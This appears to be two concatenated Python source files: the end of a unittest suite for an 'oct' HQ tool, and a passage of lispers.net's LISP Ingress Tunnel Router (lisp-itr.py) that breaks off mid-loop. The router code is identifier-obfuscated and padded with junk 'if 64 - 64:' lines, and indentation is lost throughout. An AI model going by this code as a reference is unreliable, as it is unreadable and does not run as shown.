class CmdOpts(object):
def __init__(self):
self.project_path = '/tmp/oct-test'
self.publisher_channel = None
self.no_results = False
class HQTest(unittest.TestCase):
def setUp(self):
self.turret = Process(target=run_turret)
self.turret.start()
self.bad_turret = Process(target=run_bad_turret)
self.bad_turret.start()
sys.argv = sys.argv[:1]
sys.argv += ["new-project", "/tmp/oct-test"]
main()
# update the runtime for the project
with open(os.path.join(BASE_DIR, 'fixtures', 'config.json')) as f:
data = json.load(f)
with open(os.path.join('/tmp/oct-test', 'config.json'), 'w') as f:
json.dump(data, f)
def test_run_hq(self):
"""Test hq
"""
run(CmdOpts())
def test_run_argparse(self):
"""Test runing hq with command line arguments
"""
sys.argv = sys.argv[:1]
opts = CmdOpts()
sys.argv += ["run", opts.project_path, "--with-forwarder"]
main()
def test_create_errors(self):
"""Test errors when creating project
"""
with self.assertRaises(OSError):
sys.argv = sys.argv[:1]
sys.argv += ["new-project", "/tmp/"]
main()
def tearDown(self):
shutil.rmtree('/tmp/oct-test')
self.turret.terminate()
self.bad_turret.terminate()
if os.path.isfile('/tmp/results.sqlite'):
os.remove('/tmp/results.sqlite')
if __name__ == '__main__':
unittest.main()
|
lisp-itr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-itr.py
#
# This file performs LISP Ingress Tunnel Router (ITR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
from future import standard_library
standard_library . install_aliases ( )
from builtins import str
from builtins import range
import lisp
import lispconfig
import socket
import select
import threading
import time
import os
from subprocess import getoutput
import struct
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
II1iII1i = [ None , None , None ]
oO0oIIII = None
Oo0oO0oo0oO00 = None
i111I = None
II1Ii1iI1i = None
iiI1iIiI = lisp . lisp_get_ephemeral_port ( )
OOo = lisp . lisp_get_ephemeral_port ( )
Ii1IIii11 = None
Oooo0000 = None
i11 = None
I11 = None
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
oo0O000OoO = False
if 34 - 34: I11i * I1IiiI
if 31 - 31: II111iiii + OoO0O00 . I1Ii111
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
i1iIIi1 = threading . Lock ( )
if 50 - 50: i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
def IIiiIiI1 ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "ITR" , [ ] ) )
if 41 - 41: OoOoOO00
if 13 - 13: Oo0Ooo . i11iIiiIii - iIii1I11I1II1 - OoOoOO00
if 6 - 6: I1IiiI / Oo0Ooo % Ii1I
if 84 - 84: i11iIiiIii . o0oOOo0O0Ooo
if 100 - 100: Ii1I - Ii1I - I1Ii111
if 20 - 20: OoooooooOO
if 13 - 13: i1IIi - Ii1I % oO0o / iIii1I11I1II1 % iII111i
def oo ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "ITR" ) )
if 68 - 68: I11i + OOooOOo . iIii1I11I1II1 - IiII % iIii1I11I1II1 - ooOoO0o
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
def I1i1iii ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "ITR" ) )
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
def oo0 ( lisp_sockets , lisp_ephem_port ) :
lisp . lisp_set_exception ( )
if 57 - 57: OOooOOo . OOooOOo
if 95 - 95: O0 + OoO0O00 . II111iiii / O0
if 97 - 97: ooOoO0o - OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - OoooooooOO
if 59 - 59: O0 + I1IiiI + IiII % I1IiiI
for o0OOoo0OO0OOO in list ( lisp . lisp_crypto_keys_by_nonce . values ( ) ) :
for iI1iI1I1i1I in o0OOoo0OO0OOO : del ( iI1iI1I1i1I )
if 24 - 24: I1ii11iIi11i
lisp . lisp_crypto_keys_by_nonce = { }
if 56 - 56: ooOoO0o
if 92 - 92: iII111i . I11i + o0oOOo0O0Ooo
if 28 - 28: i1IIi * Oo0Ooo - o0oOOo0O0Ooo * IiII * Ii1I / OoO0O00
if 94 - 94: II111iiii % I1ii11iIi11i / OoOoOO00 * iIii1I11I1II1
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
if ( lisp . lisp_l2_overlay ) :
O0o0 = lisp . LISP_AFI_MAC
OO00Oo = lisp . lisp_default_iid
O0OOO0OOoO0O = lisp . lisp_address ( O0o0 , "0000-0000-0000" , 0 , OO00Oo )
O0OOO0OOoO0O . mask_len = 0
O00Oo000ooO0 = lisp . lisp_address ( O0o0 , "ffff-ffff-ffff" , 48 , OO00Oo )
lisp . lisp_send_map_request ( lisp_sockets , lisp_ephem_port , O0OOO0OOoO0O , O00Oo000ooO0 , None )
if 100 - 100: O0 + IiII - OOooOOo + i11iIiiIii * Ii1I
if 30 - 30: o0oOOo0O0Ooo . Ii1I - OoooooooOO
if 8 - 8: i1IIi - iIii1I11I1II1 * II111iiii + i11iIiiIii / I1Ii111 % OOooOOo
if 16 - 16: I1ii11iIi11i + OoO0O00 - II111iiii
if 85 - 85: OoOoOO00 + i1IIi
lisp . lisp_timeout_map_cache ( lisp . lisp_map_cache )
if 58 - 58: II111iiii * OOooOOo * I1ii11iIi11i / OOooOOo
if 75 - 75: oO0o
if 50 - 50: Ii1I / Oo0Ooo - oO0o - I11i % iII111i - oO0o
if 91 - 91: OoO0O00 / I11i - II111iiii . I11i
i11 = threading . Timer ( 60 , oo0 ,
[ lisp_sockets , lisp_ephem_port ] )
i11 . start ( )
return
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
def OO0oOoOO0oOO0 ( lisp_socket ) :
lisp . lisp_set_exception ( )
if 86 - 86: OOooOOo
OOoo0O = lisp . lisp_get_timestamp ( )
for Oo0ooOo0o in lisp . lisp_db_list :
if ( Oo0ooOo0o . dynamic_eid_configured ( ) == False ) : continue
if 22 - 22: iIii1I11I1II1 / i11iIiiIii * iIii1I11I1II1 * II111iiii . OOooOOo / i11iIiiIii
Iiii = [ ]
for OO0OoO0o00 in list ( Oo0ooOo0o . dynamic_eids . values ( ) ) :
ooOO0O0ooOooO = OO0OoO0o00 . last_packet
if ( ooOO0O0ooOooO == None ) : continue
if ( ooOO0O0ooOooO + OO0OoO0o00 . timeout > OOoo0O ) : continue
if 55 - 55: o0oOOo0O0Ooo * OoOoOO00
if 61 - 61: I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if ( lisp . lisp_program_hardware ) :
IIIIiiII111 = OO0OoO0o00 . dynamic_eid . print_prefix_no_iid ( )
if ( lisp . lisp_arista_is_alive ( IIIIiiII111 ) ) :
lisp . lprint ( ( "Hardware indicates dynamic-EID {} " + "still active" ) . format ( lisp . green ( IIIIiiII111 , False ) ) )
if 97 - 97: I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
continue
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
oOOo0oOo0 = OO0OoO0o00 . dynamic_eid . print_address ( )
II = "learn%{}%None" . format ( oOOo0oOo0 )
II = lisp . lisp_command_ipc ( II , "lisp-itr" )
lisp . lisp_ipc ( II , lisp_socket , "lisp-etr" )
if 60 - 60: I1IiiI
lisp . lprint ( "Dynamic-EID {}" . format ( lisp . bold ( lisp . green ( oOOo0oOo0 , False ) + " activity timeout" ,
# II111iiii . I1IiiI
False ) ) )
Iiii . append ( oOOo0oOo0 )
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
for oOOo0oOo0 in Iiii : Oo0ooOo0o . dynamic_eids . pop ( oOOo0oOo0 )
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
threading . Timer ( lisp . LISP_DEFAULT_DYN_EID_TIMEOUT ,
OO0oOoOO0oOO0 , [ lisp_socket ] ) . start ( )
return
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
def oOooOo0 ( ) :
if ( lisp . lisp_is_macos ( ) ) : return ( [ "en0" , "en1" , "lo0" ] )
if 38 - 38: I1Ii111
if 84 - 84: iIii1I11I1II1 % iII111i / iIii1I11I1II1 % I11i
if 45 - 45: O0
if 26 - 26: I11i - iIii1I11I1II1 - I1IiiI / OoO0O00 . OoOoOO00 % iIii1I11I1II1
OO = "Link encap"
iIiIIi1 = getoutput ( "ifconfig | egrep '{}'" . format ( OO ) )
if ( iIiIIi1 == "" ) :
OO = ": flags="
iIiIIi1 = getoutput ( "ifconfig | egrep '{}'" . format ( OO ) )
if 7 - 7: ooOoO0o - Oo0Ooo - oO0o + ooOoO0o
if 26 - 26: Ii1I
iIiIIi1 = iIiIIi1 . split ( "\n" )
if 35 - 35: Ii1I - I1IiiI % o0oOOo0O0Ooo . OoooooooOO % Ii1I
I1i1Iiiii = [ ]
for OOo0oO00ooO00 in iIiIIi1 :
oOO0O00oO0Ooo = OOo0oO00ooO00 . split ( OO ) [ 0 ] . replace ( " " , "" )
I1i1Iiiii . append ( oOO0O00oO0Ooo )
if 67 - 67: OoO0O00 - OOooOOo
return ( I1i1Iiiii )
if 36 - 36: IiII
if 36 - 36: ooOoO0o / O0 * Oo0Ooo - OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
def I111I1Iiii1i ( ) :
global II1iII1i
global oO0oIIII
global Oo0oO0oo0oO00
global i111I
global II1Ii1iI1i
global Ii1IIii11 , Oooo0000
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
lisp . lisp_i_am ( "itr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "ITR starting up" )
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
lisp . lisp_get_local_interfaces ( )
lisp . lisp_get_local_macs ( )
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
if 49 - 49: I1IiiI - I11i
II1iII1i [ 0 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV4 )
II1iII1i [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
oO0oIIII = lisp . lisp_open_listen_socket ( "" , "lisp-itr" )
Oo0oO0oo0oO00 = lisp . lisp_open_listen_socket ( "" , "lispers.net-itr" )
II1iII1i [ 2 ] = oO0oIIII
OoOOoOooooOOo = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
i111I = lisp . lisp_open_listen_socket ( OoOOoOooooOOo ,
str ( iiI1iIiI ) )
if 87 - 87: I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
II1Ii1iI1i = lisp . lisp_open_listen_socket ( "0.0.0.0" ,
str ( OOo ) )
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
Ii1IIii11 = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
Ii1IIii11 . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if ( lisp . lisp_is_raspbian ( ) == False ) :
Oooo0000 = socket . socket ( socket . AF_INET6 , socket . SOCK_RAW ,
socket . IPPROTO_UDP )
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
lisp . lisp_ipc_socket = oO0oIIII
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
threading . Thread ( target = OoOOo0OOoO ) . start ( )
if 72 - 72: Ii1I
if 1 - 1: OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
lisp . lisp_load_checkpoint ( )
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
if 26 - 26: Ii1I % I1ii11iIi11i
if 76 - 76: IiII * iII111i
if 52 - 52: OOooOOo
lisp . lisp_load_split_pings = ( os . getenv ( "LISP_LOAD_SPLIT_PINGS" ) != None )
if 19 - 19: I1IiiI
if 25 - 25: Ii1I / ooOoO0o
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if 71 - 71: I1Ii111 . II111iiii
i11 = threading . Timer ( 60 , oo0 ,
[ II1iII1i , iiI1iIiI ] )
i11 . start ( )
if 62 - 62: OoooooooOO . I11i
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
threading . Timer ( lisp . LISP_DEFAULT_DYN_EID_TIMEOUT ,
OO0oOoOO0oOO0 , [ oO0oIIII ] ) . start ( )
return ( True )
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
def o0ooooO0o0O ( ) :
iiIi11iI1iii = open ( "./lisp.config" , "r" )
if 67 - 67: O0 / I1Ii111
OOO0000oO = False
iI1i111I1Ii = 0
for i11i1ii1I in iiIi11iI1iii :
if ( i11i1ii1I == "lisp database-mapping {\n" ) : OOO0000oO = True
if ( i11i1ii1I == "}\n" ) : OOO0000oO = False
if ( OOO0000oO == False ) : continue
if ( i11i1ii1I [ 0 ] == " " and i11i1ii1I . find ( "prefix {" ) != - 1 ) : iI1i111I1Ii += 1
if 88 - 88: I11i % I1ii11iIi11i
iiIi11iI1iii . close ( )
return ( iI1i111I1Ii )
if 48 - 48: ooOoO0o / I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / i1IIi
if 92 - 92: Oo0Ooo % Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
def O00oOOooo ( ) :
if 50 - 50: I1ii11iIi11i % O0 * o0oOOo0O0Ooo
if 5 - 5: IiII * OoOoOO00
if 5 - 5: I1Ii111
if 90 - 90: I1Ii111 . ooOoO0o / Ii1I - I11i
if 40 - 40: OoooooooOO
iI1i111I1Ii = o0ooooO0o0O ( )
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
I1IiIiiIiIII = os . getenv ( "LISP_ITR_WAIT_TIME" )
I1IiIiiIiIII = 1 if ( I1IiIiiIiIII == None ) else int ( I1IiIiiIiIII )
if 8 - 8: oO0o / I1ii11iIi11i
if 20 - 20: I1IiiI
if 95 - 95: iII111i - I1IiiI
if 34 - 34: ooOoO0o * I1IiiI . i1IIi * ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
while ( iI1i111I1Ii != len ( lisp . lisp_db_list ) ) :
lisp . lprint ( ( "Waiting {} second(s) for {} database-mapping EID-" + "prefixes, {} processed so far ..." ) . format ( I1IiIiiIiIII , iI1i111I1Ii ,
# I1ii11iIi11i % OoOoOO00 * OoO0O00 % II111iiii
len ( lisp . lisp_db_list ) ) )
time . sleep ( I1IiIiiIiIII )
if 70 - 70: OoO0O00 % oO0o + OOooOOo / Ii1I % O0
if 100 - 100: o0oOOo0O0Ooo + OOooOOo * o0oOOo0O0Ooo
if 80 - 80: o0oOOo0O0Ooo * O0 - Ii1I
if 66 - 66: i11iIiiIii - OOooOOo * Oo0Ooo
if 76 - 76: i11iIiiIii + o0oOOo0O0Ooo / I1ii11iIi11i - OoO0O00 - Ii1I + I1ii11iIi11i
if 51 - 51: iIii1I11I1II1 . ooOoO0o + iIii1I11I1II1
oOoOO = [ ]
Ii1i1 = [ ]
for Oo0ooOo0o in lisp . lisp_db_list :
if ( Oo0ooOo0o . eid . is_ipv4 ( ) or Oo0ooOo0o . eid . is_ipv6 ( ) or Oo0ooOo0o . eid . is_mac ( ) ) :
oOOo0oOo0 = Oo0ooOo0o . eid . print_prefix_no_iid ( )
if ( Oo0ooOo0o . dynamic_eid_configured ( ) ) : Ii1i1 . append ( oOOo0oOo0 )
oOoOO . append ( oOOo0oOo0 )
if 65 - 65: ooOoO0o . OoooooooOO / I1ii11iIi11i . i1IIi * OoO0O00
if 19 - 19: i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
return ( oOoOO , Ii1i1 )
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
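# Appears to be the packet-capture setup thread: it gathers the configured
# EID-prefixes, installs kernel filters on Linux (unless running an L2
# overlay), builds a pcap filter expression, and starts one capture thread per
# selected interface, plus RLOC-probe-only captures on the remaining RLOC
# interfaces. When an external data plane is in use (lisp_ipc_data_plane),
# only control traffic is captured.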
def OoOOo0OOoO ( ) :
global i1iIIi1
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
lisp . lisp_set_exception ( )
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
if 46 - 46: o0oOOo0O0Ooo % iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
oOoOO , Ii1i1 = O00oOOooo ( )
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
if 54 - 54: i1IIi + II111iiii
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
if 5 - 5: Ii1I
if 46 - 46: IiII
ii1iIi1iIiI1i = None
if ( lisp . lisp_ipc_data_plane ) :
lisp . lprint ( lisp . bold ( "Data-plane packet capture disabled" , False ) )
ii1iIi1iIiI1i = "(udp src port 4342 and ip[28] == 0x28)" + " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
if 40 - 40: i1IIi % OOooOOo
if 71 - 71: OoOoOO00
lisp . lprint ( "Control-plane capture: '{}'" . format ( ii1iIi1iIiI1i ) )
else :
lisp . lprint ( "Capturing packets for source-EIDs {}" . format ( lisp . green ( str ( oOoOO ) , False ) ) )
if 14 - 14: i11iIiiIii % OOooOOo
if 82 - 82: iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % IiII / Ii1I . Ii1I
if ( lisp . lisp_pitr ) : lisp . lprint ( "Configured for PITR functionality" )
if 14 - 14: o0oOOo0O0Ooo . OOooOOo . I11i + OoooooooOO - OOooOOo + IiII
if 9 - 9: Ii1I
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
i1 = lisp . lisp_l2_overlay
if ( i1 == False ) :
if ( lisp . lisp_is_linux ( ) ) : OO0oOOoo ( oOoOO , Ii1i1 )
if 52 - 52: o0oOOo0O0Ooo % Oo0Ooo
if 64 - 64: O0 % I11i % O0 * OoO0O00 . oO0o + I1IiiI
if 75 - 75: I11i . OoooooooOO % o0oOOo0O0Ooo * I11i % OoooooooOO
if 13 - 13: IiII / i11iIiiIii % II111iiii % I11i . I1ii11iIi11i
if 8 - 8: OoOoOO00 + Oo0Ooo - II111iiii
if 11 - 11: i1IIi % i11iIiiIii - i1IIi * OoOoOO00
if ( ii1iIi1iIiI1i == None ) :
if ( lisp . lisp_pitr ) :
i1I11IiI1iiII = o00oOo0oOoo ( oOoOO , [ ] , False , True )
else :
i1I11IiI1iiII = o00oOo0oOoo ( oOoOO , Ii1i1 , i1 ,
False )
if 57 - 57: OoOoOO00 - I1ii11iIi11i
else :
i1I11IiI1iiII = ii1iIi1iIiI1i
if 50 - 50: I1Ii111 / i1IIi % OoO0O00 . I1IiiI / iII111i
if 88 - 88: OOooOOo . I11i * o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . I11i
if 10 - 10: o0oOOo0O0Ooo * Oo0Ooo % O0 * iIii1I11I1II1 . O0 % I1ii11iIi11i
if 44 - 44: II111iiii / iII111i / I11i % II111iiii / i1IIi . Ii1I
if 59 - 59: OoooooooOO
iIiIIi1 = oOooOo0 ( )
i1iiiii1 = os . getenv ( "LISP_PCAP_LIST" )
if ( i1iiiii1 == None ) :
O0iII1 = ""
IIII1i = [ ]
else :
Ii1IIIIi1ii1I = list ( set ( i1iiiii1 . split ( ) ) & set ( iIiIIi1 ) )
IIII1i = list ( set ( i1iiiii1 . split ( ) ) ^ set ( iIiIIi1 ) )
O0iII1 = "user-selected "
lisp . lprint ( "User pcap-list: {}, active-interfaces: {}" . format ( i1iiiii1 , iIiIIi1 ) )
if 13 - 13: I1IiiI % OoOoOO00 . I1ii11iIi11i / Oo0Ooo % OOooOOo . OoooooooOO
iIiIIi1 = Ii1IIIIi1ii1I
if 22 - 22: IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
if 92 - 92: ooOoO0o
II11iI111i1 = ( i1I11IiI1iiII . find ( "ether host" ) != - 1 )
for Oo00OoOo in iIiIIi1 :
if ( Oo00OoOo in [ "lo" , "lispers.net" ] and II11iI111i1 ) :
